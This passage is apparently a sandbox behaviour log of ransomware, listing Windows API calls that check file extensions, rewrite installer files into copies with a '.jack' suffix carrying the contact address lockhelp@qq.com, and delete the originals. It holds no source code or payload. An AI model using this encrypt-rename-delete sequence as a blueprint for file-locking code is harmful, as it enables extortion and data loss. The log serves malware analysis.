(lpString1=".jpg", lpString2=".rtf") returned -1 [0198.020] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.020] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.020] lstrlenW (lpString=".doc") returned 4 [0198.020] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0198.020] lstrlenW (lpString=".docx") returned 5 [0198.020] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0198.020] lstrlenW (lpString=".pdf") returned 4 [0198.020] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0198.020] lstrlenW (lpString=".xls") returned 4 [0198.020] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0198.020] lstrlenW (lpString=".xlsx") returned 5 [0198.020] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0198.020] lstrlenW (lpString=".ppt") returned 4 [0198.020] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0198.020] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.020] lstrlenW (lpString=".zip") returned 4 [0198.020] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0198.020] lstrlenW (lpString=".rar") returned 4 [0198.020] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0198.020] lstrlenW (lpString=".bz2") returned 4 [0198.021] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0198.021] lstrlenW (lpString=".7z") returned 3 [0198.021] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0198.021] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.021] lstrlenW (lpString=".dbf") returned 4 [0198.021] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0198.021] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.021] lstrlenW (lpString=".1cd") returned 4 [0198.021] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0198.021] lstrlenW (lpString="C:\\588bce7c90097ed212\\2052\\eula.rtf") returned 35 [0198.021] lstrlenW (lpString=".jpg") returned 4 [0198.021] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0198.021] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0198.021] lstrlenW (lpString="eula.rtf") returned 8 [0198.021] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0198.122] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=4015) returned 1 [0198.122] CloseHandle (hObject=0x3fc) returned 1 [0198.122] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf")) returned 0x80 [0198.122] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.122] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0198.122] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.122] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.122] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0198.123] GetLastError () returned 0x0 [0198.123] ReadFile (in: hFile=0x3fc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xfaf, lpOverlapped=0x0) returned 1 [0198.125] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xfb0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xfb0, lpOverlapped=0x0) returned 1 [0198.126] ReadFile (in: hFile=0x3fc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.126] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0198.126] SetEndOfFile (hFile=0x404) returned 1 [0198.127] CloseHandle (hObject=0x404) returned 1 [0198.127] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.127] SetEndOfFile (hFile=0x3fc) returned 1 [0198.128] CloseHandle (hObject=0x3fc) returned 1 [0198.128] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.129] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\2070\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\2070\\eula.rtf")) returned 1 [0198.129] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.129] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.129] lstrlenW (lpString=".doc") returned 4 [0198.129] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0198.129] lstrlenW (lpString=".docx") returned 5 [0198.129] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0198.129] lstrlenW (lpString=".pdf") returned 4 [0198.129] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0198.129] lstrlenW (lpString=".xls") returned 4 [0198.129] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0198.129] lstrlenW (lpString=".xlsx") returned 5 [0198.129] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0198.129] lstrlenW (lpString=".ppt") returned 4 [0198.129] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0198.129] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.129] lstrlenW (lpString=".zip") returned 4 [0198.129] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0198.129] lstrlenW (lpString=".rar") returned 4 [0198.129] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0198.130] lstrlenW (lpString=".bz2") returned 4 [0198.130] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0198.130] lstrlenW (lpString=".7z") returned 3 [0198.130] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0198.130] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.130] lstrlenW (lpString=".dbf") returned 4 [0198.130] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0198.130] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.130] lstrlenW (lpString=".1cd") returned 4 [0198.130] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0198.130] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.130] lstrlenW (lpString=".jpg") returned 4 [0198.130] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0198.130] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.130] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.130] lstrlenW (lpString=".doc") returned 4 [0198.130] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0198.130] lstrlenW (lpString=".docx") returned 5 [0198.130] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0198.130] lstrlenW (lpString=".pdf") returned 4 [0198.130] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0198.130] lstrlenW (lpString=".xls") returned 4 [0198.130] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0198.130] lstrlenW (lpString=".xlsx") returned 5 [0198.130] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0198.130] lstrlenW (lpString=".ppt") returned 4 [0198.130] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0198.130] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.131] lstrlenW (lpString=".zip") returned 4 [0198.131] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0198.131] lstrlenW (lpString=".rar") returned 4 [0198.131] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0198.131] lstrlenW (lpString=".bz2") returned 4 [0198.131] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0198.131] lstrlenW (lpString=".7z") returned 3 [0198.131] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0198.131] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.131] lstrlenW (lpString=".dbf") returned 4 [0198.131] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0198.131] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.131] lstrlenW (lpString=".1cd") returned 4 [0198.131] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0198.131] lstrlenW (lpString="C:\\588bce7c90097ed212\\2070\\eula.rtf") returned 35 [0198.131] lstrlenW (lpString=".jpg") returned 4 [0198.131] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0198.131] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0198.131] lstrlenW (lpString="eula.rtf") returned 8 [0198.131] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0198.132] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=6309) returned 1 [0198.132] CloseHandle (hObject=0x3fc) returned 1 [0198.132] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf")) returned 0x80 [0198.132] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.132] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0198.132] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.132] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.132] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0198.132] GetLastError () returned 0x0 [0198.132] ReadFile (in: hFile=0x3fc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x18a5, lpOverlapped=0x0) returned 1 [0198.135] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x18b0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x18b0, lpOverlapped=0x0) returned 1 [0198.136] ReadFile (in: hFile=0x3fc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.136] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0198.136] SetEndOfFile (hFile=0x404) returned 1 [0198.137] CloseHandle (hObject=0x404) returned 1 [0198.137] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.138] SetEndOfFile (hFile=0x3fc) returned 1 [0198.138] CloseHandle (hObject=0x3fc) returned 1 [0198.139] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.139] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3076\\eula.rtf")) returned 1 [0198.139] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.139] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.139] lstrlenW (lpString=".doc") returned 4 [0198.139] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0198.139] lstrlenW (lpString=".docx") returned 5 [0198.139] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0198.139] lstrlenW (lpString=".pdf") returned 4 [0198.139] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0198.139] lstrlenW (lpString=".xls") returned 4 [0198.139] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0198.139] lstrlenW (lpString=".xlsx") returned 5 [0198.140] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0198.140] lstrlenW (lpString=".ppt") returned 4 [0198.140] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0198.140] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.140] lstrlenW (lpString=".zip") returned 4 [0198.140] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0198.140] lstrlenW (lpString=".rar") returned 4 [0198.140] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0198.140] lstrlenW (lpString=".bz2") returned 4 [0198.140] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0198.140] lstrlenW (lpString=".7z") returned 3 [0198.140] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0198.140] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.140] lstrlenW (lpString=".dbf") returned 4 [0198.140] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0198.140] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.140] lstrlenW (lpString=".1cd") returned 4 [0198.140] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0198.140] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.140] lstrlenW (lpString=".jpg") returned 4 [0198.140] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0198.140] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.140] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.140] lstrlenW (lpString=".doc") returned 4 [0198.140] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0198.140] lstrlenW (lpString=".docx") returned 5 [0198.140] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0198.140] lstrlenW (lpString=".pdf") returned 4 [0198.141] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0198.141] lstrlenW (lpString=".xls") returned 4 [0198.141] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0198.141] lstrlenW (lpString=".xlsx") returned 5 [0198.141] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0198.141] lstrlenW (lpString=".ppt") returned 4 [0198.141] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0198.141] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.141] lstrlenW (lpString=".zip") returned 4 [0198.141] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0198.141] lstrlenW (lpString=".rar") returned 4 [0198.141] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0198.141] lstrlenW (lpString=".bz2") returned 4 [0198.141] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0198.141] lstrlenW (lpString=".7z") returned 3 [0198.141] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0198.141] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.141] lstrlenW (lpString=".dbf") returned 4 [0198.141] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0198.141] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.141] lstrlenW (lpString=".1cd") returned 4 [0198.141] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0198.141] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\eula.rtf") returned 35 [0198.141] lstrlenW (lpString=".jpg") returned 4 [0198.141] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0198.142] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0198.142] lstrlenW (lpString="LocalizedData.xml") returned 17 [0198.142] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0198.142] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=60816) returned 1 [0198.142] CloseHandle (hObject=0x3fc) returned 1 [0198.142] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml")) returned 0x80 [0198.142] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0198.142] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0198.142] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.142] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.143] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0198.143] GetLastError () returned 0x0 [0198.143] ReadFile (in: hFile=0x3fc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xed90, lpOverlapped=0x0) returned 1 [0198.217] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xeda0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xeda0, lpOverlapped=0x0) returned 1 [0198.219] ReadFile (in: hFile=0x3fc, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.219] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xf6, lpOverlapped=0x0) returned 1 [0198.219] SetEndOfFile (hFile=0x404) returned 1 [0198.219] CloseHandle (hObject=0x404) returned 1 [0198.223] SetFilePointerEx (in: hFile=0x3fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.223] SetEndOfFile (hFile=0x3fc) returned 1 [0198.225] CloseHandle (hObject=0x3fc) returned 1 [0198.225] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0198.225] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\3076\\localizeddata.xml")) returned 1 [0198.226] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.226] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.226] lstrlenW (lpString=".doc") returned 4 [0198.226] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.226] lstrlenW (lpString=".docx") returned 5 [0198.226] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.226] lstrlenW (lpString=".pdf") returned 4 [0198.226] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.226] lstrlenW (lpString=".xls") returned 4 [0198.226] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.226] lstrlenW (lpString=".xlsx") returned 5 [0198.226] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.226] lstrlenW (lpString=".ppt") returned 4 [0198.226] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.226] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.226] lstrlenW (lpString=".zip") returned 4 [0198.226] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.226] lstrlenW (lpString=".rar") returned 4 [0198.226] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.226] lstrlenW (lpString=".bz2") returned 4 [0198.226] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.226] lstrlenW (lpString=".7z") returned 3 [0198.226] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.226] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.226] lstrlenW (lpString=".dbf") returned 4 [0198.226] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.226] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.226] lstrlenW (lpString=".1cd") returned 4 [0198.226] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.227] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.227] lstrlenW (lpString=".jpg") returned 4 [0198.227] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.227] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.227] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.227] lstrlenW (lpString=".doc") returned 4 [0198.227] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0198.227] lstrlenW (lpString=".docx") returned 5 [0198.227] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0198.227] lstrlenW (lpString=".pdf") returned 4 [0198.227] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0198.227] lstrlenW (lpString=".xls") returned 4 [0198.227] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0198.227] lstrlenW (lpString=".xlsx") returned 5 [0198.227] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0198.227] lstrlenW (lpString=".ppt") returned 4 [0198.227] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0198.227] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.227] lstrlenW (lpString=".zip") returned 4 [0198.227] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0198.227] lstrlenW (lpString=".rar") returned 4 [0198.227] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0198.227] lstrlenW (lpString=".bz2") returned 4 [0198.227] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0198.227] lstrlenW (lpString=".7z") returned 3 [0198.227] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0198.228] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.228] lstrlenW (lpString=".dbf") returned 4 [0198.228] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0198.228] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.228] lstrlenW (lpString=".1cd") returned 4 [0198.228] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0198.228] lstrlenW (lpString="C:\\588bce7c90097ed212\\3076\\LocalizedData.xml") returned 44 [0198.228] lstrlenW (lpString=".jpg") returned 4 [0198.228] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0198.228] lstrcmpiW (lpString1=".rtf", lpString2=".jack") returned 1 [0198.228] lstrlenW (lpString="eula.rtf") returned 8 [0198.228] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\3082\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\3082\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3fc [0198.228] GetFileSizeEx (in: hFile=0x3fc, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=3069) returned 1 [0198.228] CloseHandle (hObject=0x3fc) returned 1 [0198.229] GetFileAttributesW 